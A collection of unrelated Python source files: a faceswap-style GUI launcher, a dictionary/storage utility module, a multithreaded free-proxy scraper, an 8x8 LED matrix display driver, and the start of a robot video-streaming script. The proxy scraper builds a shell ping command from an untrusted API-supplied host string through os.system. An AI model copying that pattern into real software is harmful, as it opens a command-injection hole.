else:
self.process.send_signal(signal.SIGINT)
while True:
timeelapsed = time() - now
if self.process.poll() is not None:
break
if timeelapsed > 30:
raise ValueError('Timeout reached sending Exit Signal')
return
except ValueError as err:
print(err)
elif self.command in self.__group_processes:
print('Terminating Process Group...')
pgid = os.getpgid(self.process.pid)
try:
os.killpg(pgid, signal.SIGINT)
self.process.wait(timeout=10)
print('Terminated')
except TimeoutExpired:
print('Termination timed out. Killing Process Group...')
os.killpg(pgid, signal.SIGKILL)
print('Killed')
else:
print('Terminating Process...')
try:
self.process.terminate()
self.process.wait(timeout=10)
print('Terminated')
except TimeoutExpired:
print('Termination timed out. Killing Process...')
self.process.kill()
print('Killed')
def set_final_status(self, returncode):
""" Set the status bar output based on subprocess return code """
if returncode == 0 or returncode == 3221225786:  # 0xC000013A: STATUS_CONTROL_C_EXIT on Windows
status = 'Ready'
elif returncode == -15:
status = 'Terminated - {}.py'.format(self.command)
elif returncode == -9:
status = 'Killed - {}.py'.format(self.command)
elif returncode == -6:
status = 'Aborted - {}.py'.format(self.command)
else:
status = 'Failed - {}.py. Return Code: {}'.format(self.command, returncode)
self.utils.guitext['status'].set(status)
class Gui(object):
""" The GUI process. """
def __init__(self, arguments, subparsers):
# Don't try to load the GUI if there is no display or there are
# problems importing tkinter
if not self.check_display() or not self.check_tkinter_available():
return
cmd = sys.argv
# If not running in gui mode return before starting to create a window
if 'gui' not in cmd:
return
self.args = arguments
self.opts = self.extract_options(subparsers)
self.utils = Utils(self.opts, calling_file=cmd[0])
self.root = FaceswapGui(self.utils, calling_file=cmd[0])
@staticmethod
def check_display():
""" Check whether there is a display to output the GUI. If running on
Windows then assume not running in headless mode """
if not os.environ.get('DISPLAY', None) and os.name != 'nt':
if os.name == 'posix':
print('macOS users need to install XQuartz. '
'See https://support.apple.com/en-gb/HT201341')
return False
return True
@staticmethod
def check_tkinter_available():
""" Check whether TkInter is installed on user's machine """
tkinter_vars = [tk, ttk, filedialog, messagebox, TclError]
if any(var is None for var in tkinter_vars):
print(
"It looks like TkInter isn't installed for your OS, so "
"the GUI has been "
"disabled. To enable the GUI please install the TkInter "
"application.\n"
"You can try:\n"
" Windows/macOS: Install ActiveTcl Community "
"Edition from "
"www.activestate.com\n"
" Ubuntu/Mint/Debian: sudo apt install python3-tk\n"
" Arch: sudo pacman -S tk\n"
" CentOS/Redhat: sudo yum install tkinter\n"
" Fedora: sudo dnf install python3-tkinter\n",
file=sys.stderr)
return False
return True
def extract_options(self, subparsers):
""" Extract the existing ArgParse Options """
opts = {cmd: subparsers[cmd].argument_list + subparsers[cmd].optional_arguments
for cmd in subparsers.keys()}
for command in opts.values():
# Iterate over a copy, as removing items while iterating skips elements
for opt in list(command):
if opt.get('help', '') == SUPPRESS:
command.remove(opt)
continue
ctl, sysbrowser, filetypes, actions_open_type = self.set_control(opt)
opt['control_title'] = self.set_control_title(
opt.get('opts', ''))
opt['control'] = ctl
opt['filesystem_browser'] = sysbrowser
opt['filetypes'] = filetypes
opt['actions_open_type'] = actions_open_type
return opts
@staticmethod
def set_control_title(opts):
""" Take the option switch and format it nicely """
ctltitle = opts[1] if len(opts) == 2 else opts[0]
ctltitle = ctltitle.replace('-', ' ').replace('_', ' ').strip().title()
return ctltitle
@staticmethod
def set_control(option):
""" Set the control and filesystem browser to use for each option """
sysbrowser = None
filetypes = None
actions_open_type = None
ctl = ttk.Entry
if option.get('action', '') == FullPaths:
sysbrowser = 'folder'
elif option.get('action', '') == DirFullPaths:
sysbrowser = 'folder'
elif option.get('action', '') == FileFullPaths:
sysbrowser = 'load'
filetypes = option.get('filetypes', None)
elif option.get('action', '') == ComboFullPaths:
sysbrowser = 'combo'
actions_open_type = option['actions_open_type']
filetypes = option.get('filetypes', None)
elif option.get('choices', '') != '':
ctl = ttk.Combobox
elif option.get('action', '') == 'store_true':
ctl = ttk.Checkbutton
return ctl, sysbrowser, filetypes, actions_open_type
def process(self):
""" Builds the GUI """
self.utils.debugconsole = self.args.debug
self.root.build_gui()
self.root.gui.mainloop()
|
storage.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
set
except NameError:
from sets import Set as set
from torngas.utils import safeunicode
from threading import local as threadlocal
import warnings
import sys, copy
PY3 = (sys.version_info >= (3,))
class Storage(dict):
"""
from web.py
对字典进行扩展,使其支持通过 dict.a形式访问以代替dict['a']
"""
def __getattr__(self, key):
try:
return self[key]
except KeyError as k:
raise AttributeError(k)
def __setattr__(self, key, value):
self[key] = value
def __delattr__(self, key):
try:
del self[key]
except KeyError as k:
raise AttributeError(k)
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
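# Usage sketch:
#   s = Storage(a=1)
#   s.a          # 1
#   s.b = 2      # equivalent to s['b'] = 2
#   s.missing    # raises AttributeError rather than KeyError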
storage = Storage
def storify(mapping, *requireds, **defaults):
"""
Creates a `storage` object from dictionary `mapping`, raising `KeyError` if
d doesn't have all of the keys in `requireds` and using the default
values for keys found in `defaults`.
For example, `storify({'a':1, 'c':3}, b=2, c=0)` will return the equivalent of
`storage({'a':1, 'b':2, 'c':3})`.
If a `storify` value is a list (e.g. multiple values in a form submission),
`storify` returns the last element of the list, unless the key appears in
`defaults` as a list. Thus:
>>> storify({'a':[1, 2]}).a
2
>>> storify({'a':[1, 2]}, a=[]).a
[1, 2]
>>> storify({'a':1}, a=[]).a
[1]
>>> storify({}, a=[]).a
[]
Similarly, if the value has a `value` attribute, `storify` will return _its_
value, unless the key appears in `defaults` as a dictionary.
>>> storify({'a':storage(value=1)}).a
1
>>> storify({'a':storage(value=1)}, a={}).a
<Storage {'value': 1}>
>>> storify({}, a={}).a
{}
Optionally, keyword parameter `_unicode` can be passed to convert all values to unicode.
>>> storify({'x': 'a'}, _unicode=True)
<Storage {'x': u'a'}>
>>> storify({'x': storage(value='a')}, x={}, _unicode=True)
<Storage {'x': <Storage {'value': 'a'}>}>
>>> storify({'x': storage(value='a')}, _unicode=True)
<Storage {'x': u'a'}>
"""
_unicode = defaults.pop('_unicode', False)
# If _unicode is a callable object, use it to convert strings to unicode.
to_unicode = safeunicode
if _unicode is not False and hasattr(_unicode, "__call__"):
to_unicode = _unicode
def unicodify(s):
if _unicode and isinstance(s, str):
return to_unicode(s)
else:
return s
def getvalue(x):
if hasattr(x, 'file') and hasattr(x, 'value'):
return x.value
elif hasattr(x, 'value'):
return unicodify(x.value)
else:
return unicodify(x)
stor = Storage()
for key in requireds + tuple(mapping.keys()):
value = mapping[key]
if isinstance(value, list):
if isinstance(defaults.get(key), list):
value = [getvalue(x) for x in value]
else:
value = value[-1]
if not isinstance(defaults.get(key), dict):
value = getvalue(value)
if isinstance(defaults.get(key), list) and not isinstance(value, list):
value = [value]
setattr(stor, key, value)
for (key, value) in defaults.items():
result = value
if hasattr(stor, key):
result = stor[key]
if value == () and not isinstance(result, tuple):
result = (result,)
setattr(stor, key, result)
return stor
class SortedDict(dict):
"""
A dictionary that keeps its keys in the order in which they're inserted.
"""
def __new__(cls, *args, **kwargs):
instance = super(SortedDict, cls).__new__(cls, *args, **kwargs)
instance.keyOrder = []
return instance
def __init__(self, data=None):
if data is None or isinstance(data, dict):
data = data or []
super(SortedDict, self).__init__(data)
self.keyOrder = list(data) if data else []
else:
super(SortedDict, self).__init__()
super_set = super(SortedDict, self).__setitem__
for key, value in data:
# Take the ordering from first key
if key not in self:
self.keyOrder.append(key)
# But override with last value in data (dict() does this)
super_set(key, value)
def __deepcopy__(self, memo):
return self.__class__([(key, copy.deepcopy(value, memo))
for key, value in self.items()])
def __copy__(self):
# The Python's default copy implementation will alter the state
# of self. The reason for this seems complex but is likely related to
# subclassing dict.
return self.copy()
def __setitem__(self, key, value):
if key not in self:
self.keyOrder.append(key)
super(SortedDict, self).__setitem__(key, value)
def __delitem__(self, key):
super(SortedDict, self).__delitem__(key)
self.keyOrder.remove(key)
def __iter__(self):
return iter(self.keyOrder)
def __reversed__(self):
return reversed(self.keyOrder)
def pop(self, k, *args):
result = super(SortedDict, self).pop(k, *args)
try:
self.keyOrder.remove(k)
except ValueError:
# Key wasn't in the dictionary in the first place. No problem.
pass
return result
def popitem(self):
result = super(SortedDict, self).popitem()
self.keyOrder.remove(result[0])
return result
def _iteritems(self):
for key in self.keyOrder:
yield key, self[key]
def _iterkeys(self):
for key in self.keyOrder:
yield key
def _itervalues(self):
for key in self.keyOrder:
yield self[key]
if PY3:
items = _iteritems
keys = _iterkeys
values = _itervalues
else:
iteritems = _iteritems
iterkeys = _iterkeys
itervalues = _itervalues
def items(self):
return [(k, self[k]) for k in self.keyOrder]
def keys(self):
return self.keyOrder[:]
def values(self):
return [self[k] for k in self.keyOrder]
def update(self, dict_):
for k, v in dict_.items():
self[k] = v
def setdefault(self, key, default):
if key not in self:
self.keyOrder.append(key)
return super(SortedDict, self).setdefault(key, default)
def value_for_index(self, index):
"""Returns the value of the item at the given zero-based index."""
# This, and insert() are deprecated because they cannot be implemented
# using collections.OrderedDict (Python 2.7 and up), which we'll
# eventually switch to
warnings.warn(
"SortedDict.value_for_index is deprecated", PendingDeprecationWarning,
stacklevel=2
)
return self[self.keyOrder[index]]
def insert(self, index, key, value):
"""Inserts the key, value pair before the item with the given index."""
warnings.warn(
"SortedDict.insert is deprecated", PendingDeprecationWarning,
stacklevel=2
)
if key in self.keyOrder:
n = self.keyOrder.index(key)
del self.keyOrder[n]
if n < index:
index -= 1
self.keyOrder.insert(index, key)
super(SortedDict, self).__setitem__(key, value)
def copy(self):
"""Returns a copy of this object."""
# This way of initializing the copy means it works for subclasses, too.
return self.__class__(self)
def __repr__(self):
"""
Replaces the normal dict.__repr__ with a version that returns the keys
in their sorted order.
"""
return '{%s}' % ', '.join(['%r: %r' % (k, v) for k, v in self.items()])
def clear(self):
super(SortedDict, self).clear()
self.keyOrder = []
sorteddict = SortedDict
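# A minimal usage sketch (added for illustration; collections.OrderedDict is
# the stdlib equivalent this class predates):
#
#     >>> d = sorteddict()
#     >>> d['b'] = 1
#     >>> d['a'] = 2
#     >>> d.keys()
#     ['b', 'a']
#     >>> d.insert(0, 'c', 3)   # deprecated; emits PendingDeprecationWarning
#     >>> d.keys()
#     ['c', 'b', 'a']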
class ThreadedDict(threadlocal):
"""
Thread local storage.
>>> d = ThreadedDict()
>>> d.x = 1
>>> d.x
1
>>> import threading
>>> def f(): d.x = 2
...
>>> t = threading.Thread(target=f)
>>> t.start()
>>> t.join()
>>> d.x
1
"""
_instances = set()
def __init__(self):
ThreadedDict._instances.add(self)
def __del__(self):
ThreadedDict._instances.remove(self)
def __hash__(self):
return id(self)
def clear_all():
"""Clears all ThreadedDict instances.
"""
for t in list(ThreadedDict._instances):
t.clear()
clear_all = staticmethod(clear_all)
# Define all these methods to more or less fully emulate dict -- attribute access
# is built into threading.local.
def __getitem__(self, key):
return self.__dict__[key]
def __setitem__(self, key, value):
self.__dict__[key] = value
def __delitem__(self, key):
del self.__dict__[key]
def __contains__(self, key):
return key in self.__dict__
has_key = __contains__
def clear(self):
self.__dict__.clear()
def copy(self):
return self.__dict__.copy()
def get(self, key, default=None):
return self.__dict__.get(key, default)
def items(self):
return self.__dict__.items()
def iteritems(self):
return self.__dict__.iteritems()
def keys(self):
return self.__dict__.keys()
def iterkeys(self):
return self.__dict__.iterkeys()
iter = iterkeys
def values(self):
return self.__dict__.values()
def itervalues(self):
return self.__dict__.itervalues()
def pop(self, key, *args):
return self.__dict__.pop(key, *args)
def popitem(self):
return self.__dict__.popitem()
def setdefault(self, key, default=None):
return self.__dict__.setdefault(key, default)
def update(self, *args, **kwargs):
self.__dict__.update(*args, **kwargs)
def __repr__(self):
return '<ThreadedDict %r>' % self.__dict__
__str__ = __repr__
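# Sketch of the clear_all() hook above (added for illustration): a server can
# call it between requests so one request's state never leaks into the next.
#
#     >>> ctx = ThreadedDict()
#     >>> ctx.user = 'alice'
#     >>> ThreadedDict.clear_all()
#     >>> hasattr(ctx, 'user')
#     False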
|
getProxy.py |
import threading
import requests
import os
import platform
import json
import datetime
from pydoc import locate
from colorama import Fore,init
init()
__dirname = os.path.abspath(os.path.dirname(__file__))
RDIR = ["logs"] # rewuired directorys
for DIR in RDIR:
if not os.path.isdir(__dirname+'/'+DIR):
os.mkdir(__dirname+'/'+DIR)
# Fix print issue when using Threading
s_print_lock = threading.Lock()
def s_print(*a, **b):
"""Thread safe print function"""
with s_print_lock:
print(*a, **b)
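# Quick illustrative use (an addition, not from the original script): without
# the lock, output from concurrent workers could interleave mid-line.
#
#   for n in range(4):
#       threading.Thread(target=s_print, args=("worker", n)).start()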
def PingCheckFunc(Enabled,host):
if not Enabled: # Shortcut if the check is disabled.
return True
else:
silence = " >/dev/null 2>&1" if str(platform.system() == 'Linux') else " >nul 2>&1"
response = os.system("ping "+("-c" if str(platform.system() == "Linux") else "-n ")+"1 " + host+silence)
if response == 0:
return True
else:
return False
def GetProxy(ThreadNo,ProxyList,ProxyListSplit,ProxyCount,MaxRequestFails,PingCheck,ForceLinuxOutput,ExportGeoJson,GeoJson):
"""Main Function for scraping proxys from the free api."""
fails = 0
i = 0
if platform.system() == "Linux" or ForceLinuxOutput:
spaces = "\033[0H" + ("\n"*(ThreadNo+1))
else:
spaces = ""
while i < ProxyCount:
try:
s = requests.get("https://public.freeproxyapi.com/api/Proxy/Medium")
if s.status_code == 200 and fails < MaxRequestFails:
res = s.json()
# ["Anonymous","Elite"] are the only proxy types usefull, the others are snitches.
if res['isAlive'] == True and res['proxyLevel'] in ["Anonymous","Elite"]: # just skip the proxy if it's considered 'dead', i dont value this as error.
proxy = str(res['host'])+":"+str(res['port'])
if ProxyList.count(proxy) == 0 and PingCheckFunc(PingCheck,res['host']):
ProxyList.append(proxy)
i = i + 1
s_print(spaces+Fore.GREEN+"Thread["+str(ThreadNo)+"] Got["+str(i)+"]: "+str(res['host'])+":"+str(res['port'])+(" "*10))
if ProxyListSplit['enabled'] == True: # Splitting and collecting more information.
# Create the basic data structure if needed.
# { 'enabled': True, 'Finland': { 'Socks4': { 'Elite': { 'x.x.x.x:xxxx': 'lat;lon' }, 'Anonymous': { 'x.x.x.x:xxxx': 'lat;lon' } } } }
if not res['countryName'] in ProxyListSplit:
ProxyListSplit[res['countryName']] = {}
if not res['type'] in ProxyListSplit[res['countryName']]:
ProxyListSplit[res['countryName']][res['type']] = {}
if not res['proxyLevel'] in ProxyListSplit[res['countryName']][res['type']]:
ProxyListSplit[res['countryName']][res['type']][res['proxyLevel']] = {}
proxy = str(res['host'])+":"+str(res['port'])
pos = str(res['latitude']) + ";" + str(res['longitude'])
ProxyListSplit[res['countryName']][res['type']][res['proxyLevel']][proxy] = pos
if ExportGeoJson:
CProxy = {} # current Proxy
CProxy['type'] = 'Feature'
CProxy['properties'] = {}
CProxy['properties']['name'] = res['host']
CProxy['properties']['address'] = res['countryName']
CProxy['properties']['marker-color'] = '#FF0000'
CProxy['geometry'] = {}
CProxy['geometry']['type'] = 'Point'
CProxy['geometry']['coordinates'] = []
(CProxy['geometry']['coordinates']).append(res['longitude'])
(CProxy['geometry']['coordinates']).append(res['latitude'])
(GeoJson['features']).append(CProxy)
elif fails >= MaxRequestFails:
i = ProxyCount
break
elif s.status_code != 200:
raise ConnectionError("s.status_code: "+str(s.status_code))
except Exception as err:
fails = fails + 1
s_print(spaces+Fore.RED+"Thread["+str(ThreadNo)+"] Failed."+Fore.RESET)
LOGFILE = __dirname+"/logs/Thread["+str(ThreadNo)+"].log"
MODE = 'a' if os.path.isfile(LOGFILE) else 'w'
with open(LOGFILE,MODE,encoding='utf-8') as log:
log.write(str(err)+"\n")
s_print(spaces+Fore.YELLOW+"Thread["+str(ThreadNo)+"] Finished Job."+(" "*20))
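# Shape of one GeoJSON feature built above (coordinates are
# [longitude, latitude], following the GeoJSON convention):
#
#   {"type": "Feature",
#    "properties": {"name": "1.2.3.4", "address": "Finland",
#                   "marker-color": "#FF0000"},
#    "geometry": {"type": "Point", "coordinates": [24.94, 60.17]}}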
def setup():
options = {'Threads':'int','Proxy Count':'int','Max Fails':'int','Ping Check':'bool','Split Lists?':'bool','Export Advanced':'bool','Force Linux Output':'bool','Export Geo.Json':'bool'}
settings = [1,10,2,False,False,False,False,True]
print("Just use 'enter' to use default Value shown in the []")
for i, e in enumerate(options):
res = input(e+" ("+options[e]+") ["+str(settings[i])+"]: ")
if res.replace(" ","") != "":
caster = locate(options[e])
valid = False
while not valid:
try:
if caster is bool:
# bool("False") is True, so parse boolean answers explicitly
settings[i] = res.strip().lower() in ("1", "true", "yes", "y")
else:
settings[i] = caster(res)
valid = True
except (TypeError, ValueError):
# invalid input: prompt again instead of spinning forever
res = input(e+" ("+options[e]+") ["+str(settings[i])+"]: ")
os.system('cls' if os.name == 'nt' else 'clear')
return settings # Threads, ProxyCount, MaxFails, PingCheck, SplitLists, AdvancedOutput, ForceLinuxOutput, ExportGeoJson
if __name__ == '__main__':
try:
Threads, ProxyLoopCount, MaxFails, PingCheck, SplitLists, AdvancedOutput, ForceLinuxOutput, ExportGeoJson = setup()
ProxyListShared = [] # all proxies
ProxyListSplit = {} # proxies keyed by country -> type -> level
TasksList = [] # list of all threads, joined later to sync them
GeoJson = {} if ExportGeoJson else None
if ExportGeoJson: # build the frame for the geoJson
GeoJson['type'] = 'FeatureCollection'
GeoJson['features'] = []
ProxyListSplit['enabled'] = bool(SplitLists or AdvancedOutput)
for i in range(Threads):
CT = threading.Thread(target=GetProxy, args=(i,ProxyListShared,ProxyListSplit,int(round(ProxyLoopCount / Threads,0)),MaxFails,PingCheck,ForceLinuxOutput,ExportGeoJson,GeoJson,),daemon=True )
TasksList.append(CT)
CT.start()
for Task in TasksList:
Task.join()
if platform.system() == "Linux" or ForceLinuxOutput: # cursor positioning only works reliably on Linux (on Windows it sometimes works, sometimes not)
spaces = "\033[0H" + ("\n"*(Threads+1)) # line reset with spacing.
else:
spaces = ""
print(spaces+"Result: "+str(len(ProxyListShared))+"/"+str(ProxyLoopCount)+" Proxys, saving...")
# Percentage of fullfilling the requested Proxys
PRC = (len(ProxyListShared) / ProxyLoopCount) * 100 # what we got / what we wanted * 100
print(str(round(PRC,2))+"% Sucess rate.") # round to 2 digits.
print("") # just get some space :P
MODE = 'a' if os.path.isfile('AllProxys.txt') else 'w' # we just append if the file exist, to now override existing proxys.
with open('AllProxys.txt',MODE,encoding='utf-8') as FinalSync:
for proxy in ProxyListShared:
FinalSync.write(proxy+"\n")
if AdvancedOutput:
if not os.path.isdir('advancedExport'):
os.mkdir('advancedExport')
print(spaces+"Dumping advanced output...")
date_time = datetime.datetime.now()
Filename = str(date_time.strftime("%Y-%m-%d %H_%M_%S"))
Filename = Filename.replace(" ","_")
with open(__dirname+'/advancedExport/'+Filename+".json",'w',encoding='utf-8') as AOut:
AOut.write(json.dumps(ProxyListSplit))
if ExportGeoJson:
if not os.path.isdir('geoExport'):
os.mkdir('geoExport')
date_time = datetime.datetime.now()
Filename = str(date_time.strftime("%Y-%m-%d %H_%M_%S"))
Filename = Filename.replace(" ","_")
with open(__dirname+'/geoExport/'+Filename+".json",'w',encoding='utf-8') as AOut:
AOut.write(json.dumps(GeoJson))
print("\n"+spaces+Fore.RESET)
except KeyboardInterrupt:
exit() # exit() alone sometimes failed to stop the process here, so fall back to quit()
quit()
except Exception as err:
LOGFILE = __dirname+"/logs/Main.log" # main error
MODE = 'a' if os.path.isfile(LOGFILE) else 'w'
with open(LOGFILE,MODE,encoding='utf-8') as log:
log.write(str(err)+"\n")
|
ledmatrix8x8.py | #!/usr/bin/python3
''' Test Bed for Diyhas System Status class '''
import time
from threading import Thread
import random
from Adafruit_Python_LED_Backpack.Adafruit_LED_Backpack import BicolorMatrix8x8
FIBONACCI_MODE = 0
PRIME_MODE = 1
WOPR_MODE = 2
IDLE_MODE = 3
FIRE_MODE = 4
PANIC_MODE = 5
BLACK = 0
GREEN = 1
YELLOW = 3
RED = 2
MAX_DEMO_DISPLAY = 300
MIN_DEMO_DISPLAY = 150
PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67,
71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149,
151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229,
233, 239, 241, 251]
class ModeController:
''' control changing modes. note Fire and Panic are externally controlled. '''
def __init__(self, lock):
''' create mode control variables '''
self.bus_lock = lock
self.current_mode = FIBONACCI_MODE
self.start_time = time.time()
def set(self, mode):
''' set or override the mode '''
self.bus_lock.acquire(True)
self.current_mode = mode
self.start_time = time.time()
self.bus_lock.release()
def get(self,):
return self.current_mode
def evaluate(self,):
''' advance to the next demo mode once the current one has run for 30 seconds '''
self.bus_lock.acquire(True)
if self.current_mode != FIRE_MODE:
if self.current_mode != PANIC_MODE:
if self.current_mode != IDLE_MODE:
now_time = time.time()
elapsed = now_time - self.start_time
if elapsed > 30:
self.current_mode = self.current_mode +1
self.start_time = now_time
if self.current_mode > WOPR_MODE:
self.current_mode = FIBONACCI_MODE
self.bus_lock.release()
class FibDisplay:
'''
Fibonacci display on an 8x8 matrix. Represents 1 up to the largest
64-bit Fibonacci number.
'''
def __init__(self, matrix8x8, lock):
''' create the Fibonacci display object '''
self.matrix = matrix8x8
self.bus_lock = lock
self.iterations = 0
self.fib1 = 1
self.fib2 = 1
self.fib3 = 2
def activate(self,):
''' initialize and start the Fibonacci display '''
self.bus_lock.acquire(True)
self.iterations = 0
self.fib1 = 1
self.fib2 = 1
self.fib3 = 2
self.matrix.set_brightness(5)
self.bus_lock.release()
def display(self,):
''' display the Fibonacci series as a 64-bit image '''
time.sleep(0.2)
self.bus_lock.acquire(True)
# self.matrix.clear()
for ypixel in range(0, 8):
for xpixel in range(0, 8):
self.iterations += 1
if self.iterations >= 4:
self.iterations = 1
# reg = self.fib3 >> (8 * xpixel)
# bit = reg & (1 << ypixel)
reg = self.fib3 >> (8 * xpixel)
bit = reg & (1 << ypixel)
if bit == 0:
self.matrix.set_pixel(ypixel, xpixel, 0)
else:
self.matrix.set_pixel(ypixel, xpixel, self.iterations)
# print("x=", xpixel ," y=", ypixel)
self.matrix.write_display()
self.fib1 = self.fib2
self.fib2 = self.fib3
self.fib3 = self.fib1 + self.fib2
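# roll over at F(92) = 7540113804746346429, the largest Fibonacci number
# that fits in a signed 64-bit integer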
if self.fib3 > 7540113804746346429:
self.fib1 = 1
self.fib2 = 1
self.fib3 = 2
self.bus_lock.release()
class IdleDisplay:
'''
Idle display on an 8x8 matrix. A slowly moving pixel.
'''
def __init__(self, matrix8x8, lock):
''' create the idle object '''
self.matrix = matrix8x8
self.bus_lock = lock
self.xpixel = 7
self.ypixel = 7
def activate(self,):
''' initialize and start the idle display '''
self.bus_lock.acquire(True)
self.xpixel = 7
self.ypixel = 7
self.matrix.set_brightness(8)
self.bus_lock.release()
def display(self,):
''' display the moving pixel '''
time.sleep(1.0)
self.bus_lock.acquire(True)
self.matrix.clear()
self.matrix.set_pixel(self.xpixel, self.ypixel, 0)
self.ypixel -= 1
if self.ypixel < 0:
self.ypixel = 7
self.xpixel -= 1
if self.xpixel < 0:
self.xpixel = 7
self.matrix.set_pixel(self.xpixel, self.ypixel, 1)
self.matrix.write_display()
self.bus_lock.release()
class FlasherDisplay:
'''
Flashing display on an 8x8 matrix. Full screen color.
'''
def __init__(self, matrix8x8, lock, color):
''' create the flasher object '''
self.matrix = matrix8x8
self.bus_lock = lock
self.pixel_color = color
self.toggle = True
def activate(self,):
''' initialize and start the flashing display '''
self.bus_lock.acquire(True)
self.toggle = True
self.matrix.set_brightness(15)
self.bus_lock.release()
def display(self,):
''' flash the whole screen on and off '''
time.sleep(0.5)
self.bus_lock.acquire(True)
if self.toggle:
color = self.pixel_color
self.toggle = False
else:
color = BLACK
self.toggle = True
for xpixel in range(0, 8):
for ypixel in range(0, 8):
self.matrix.set_pixel(xpixel, ypixel, color)
self.matrix.write_display()
self.bus_lock.release()
class PrimeDisplay:
'''
Prime numbers less than 256 display on an 8x8 matrix.
'''
def __init__(self, matrix8x8, lock):
''' create the prime object '''
self.matrix = matrix8x8
self.bus_lock = lock
self.index = 0
self.row = 0
self.iterations = 0
def activate(self,):
''' initialize and start the prime number display '''
self.bus_lock.acquire(True)
self.index = 0
self.row = 0
self.iterations = 0
self.matrix.set_brightness(15)
self.bus_lock.release()
def display(self,):
time.sleep(0.2)
self.bus_lock.acquire(True)
self.matrix.clear()
self.index += 1
if self.index >= len(PRIMES):
self.index = 0
self.row = 0
number = PRIMES[self.index]
row = self.row
self.row += 1
if self.row >= 8:
self.row = 0
for xpixel in range(0, 8):
bit = number & (1 << xpixel)
if self.iterations == 3:
self.iterations = 1
else:
self.iterations += 1
if bit == 0:
self.matrix.set_pixel(row, xpixel, 0)
else:
self.matrix.set_pixel(row, xpixel, self.iterations)
self.matrix.write_display()
self.bus_lock.release()
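# Each prime above is drawn as its 8-bit binary pattern across one matrix
# row; every entry in PRIMES is below 256, so eight pixels per row suffice.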
class WoprDisplay:
'''
Wargames movie computer on an 8x8 matrix.
'''
def __init__(self, matrix8x8, lock):
''' create the WOPR display object '''
self.matrix = matrix8x8
self.bus_lock = lock
def activate(self,):
''' initialize and start the WOPR display '''
self.bus_lock.acquire(True)
self.matrix.set_brightness(15)
self.bus_lock.release()
def display(self,):
time.sleep(0.5)
self.bus_lock.acquire(True)
self.matrix.clear()
for xpixel in range(0, 8):
for ypixel in range(7, 4, -1):
bit = random.randint(0, 2)
if bit == 0:
self.matrix.set_pixel(ypixel, xpixel, BLACK)
else:
self.matrix.set_pixel(ypixel, xpixel, RED)
for xpixel in range(0, 8):
for ypixel in range(4, 2, -1):
bit = random.randint(0, 2)
if bit == 0:
self.matrix.set_pixel(ypixel, xpixel, BLACK)
else:
self.matrix.set_pixel(ypixel, xpixel, YELLOW)
for xpixel in range(0, 8):
for ypixel in range(2, 1, -1):
bit = random.randint(0, 2)
if bit == 0:
self.matrix.set_pixel(ypixel, xpixel, BLACK)
else:
self.matrix.set_pixel(ypixel, xpixel, RED)
for xpixel in range(0, 8):
for ypixel in range(1, -1, -1):
bit = random.randint(0,2)
if bit == 0:
self.matrix.set_pixel(ypixel, xpixel, BLACK)
else:
self.matrix.set_pixel(ypixel, xpixel, YELLOW)
self.matrix.write_display()
self.bus_lock.release()
class LedMatrix8x8:
'''
8x8 LED matrix operations for a diyhas system
'''
def __init__(self, lock):
''' init the 8x8 LED matrix display '''
self.matrix = BicolorMatrix8x8.BicolorMatrix8x8(address=0x70)
self.matrix.begin()
self.bus_lock = lock
self.mode_controller = ModeController(self.bus_lock)
self.fib = FibDisplay(self.matrix, self.bus_lock)
self.fib.activate()
self.idle = IdleDisplay(self.matrix, self.bus_lock)
self.idle.activate()
self.fire = FlasherDisplay(self.matrix, self.bus_lock, RED)
self.fire.activate()
self.panic = FlasherDisplay(self.matrix, self.bus_lock, YELLOW)
self.panic.activate()
self.prime = PrimeDisplay(self.matrix, self.bus_lock)
self.prime.activate()
self.wopr = WoprDisplay(self.matrix, self.bus_lock)
self.wopr.activate()
self.matrix8x8_thread = Thread(target=self.matrix8x8_timed_update)
self.matrix8x8_thread.daemon = True
def matrix8x8_timed_update(self,):
''' update the matrix 8x8 based on mode '''
while True:
mode = self.mode_controller.get()
if mode == FIBONACCI_MODE:
self.fib.display()
elif mode == IDLE_MODE:
self.idle.display()
elif mode == FIRE_MODE:
self.fire.display()
elif mode == PANIC_MODE:
self.panic.display()
elif mode == PRIME_MODE:
self.prime.display()
elif mode == WOPR_MODE:
self.wopr.display()
self.mode_controller.evaluate()
def set_mode(self, mode, override=False):
''' set display mode '''
if override:
self.mode_controller.set(mode)
current_mode = self.mode_controller.get()
if current_mode == FIRE_MODE or current_mode == PANIC_MODE:
return
self.mode_controller.set(mode)
def run(self):
''' start the matrix 8x8 display updates '''
self.matrix8x8_thread.start()
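# Minimal usage sketch (added for illustration; assumes the bicolor backpack
# is attached at I2C address 0x70):
#
#   import threading
#   panel = LedMatrix8x8(threading.Lock())
#   panel.run()                # starts the daemon update thread
#   panel.set_mode(WOPR_MODE)  # jump straight to the WOPR display
#   time.sleep(30)             # demo modes auto-rotate every 30 seconds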
if __name__ == '__main__':
exit()
|
send_video.py | import subprocess
import shlex
import re
import os
import time
import platform
import json
import sys
import base64
import random
import datetime
import traceback
import robot_util
import _thread
import copy
import argparse
import audio_util
import urllib.request
import rtc_signalling
from subprocess import Popen, PIPE
from threading import Thread
from queue import Queue
#from Queue import Queue # Python 2
import video_util
try:
from usb.core import find as finddev
except:
print("usb MODULE IMPORT FAILED, TRY INSTALLING WITH pip")
class DummyProcess:
def poll(self):
return None
def kill(self):
# no-op so dry runs survive the process-restart logic below
pass
def __init__(self):
self.pid = 123456789
parser = argparse.ArgumentParser(description='robot control')
parser.add_argument('camera_id')
parser.add_argument('video_device_number', default=0, type=int)
parser.add_argument('--api-url', help="Server that robot will connect to listen for API update events", default='https://api.robotstreamer.com')
parser.add_argument('--xres', type=int, default=768)
parser.add_argument('--yres', type=int, default=432)
parser.add_argument('--audio-device-number', default=1, type=int)
parser.add_argument('--audio-device-name')
parser.add_argument('--audio-rate', default="32000", help="examples: 44100, 48000, or a comma-delimited list like 16000,32000 to alternate rates on each restart (this helped make a C920 work reliably)")
parser.add_argument('--kbps', default=350, type=int)
parser.add_argument('--kbps-audio', default=64, type=int)
parser.add_argument('--framerate', default=25, type=int)
parser.add_argument('--protocol', default='jsmpeg', help="options: jsmpeg, H264, VP8")
parser.add_argument('--h264preset', default='ultrafast')
parser.add_argument('--h264extraParams', default='-tune zerolatency')
parser.add_argument('--h264codecParams', default='nal-hrd=cbr:keyint=50')
parser.add_argument('--VPXextraParams', default='')
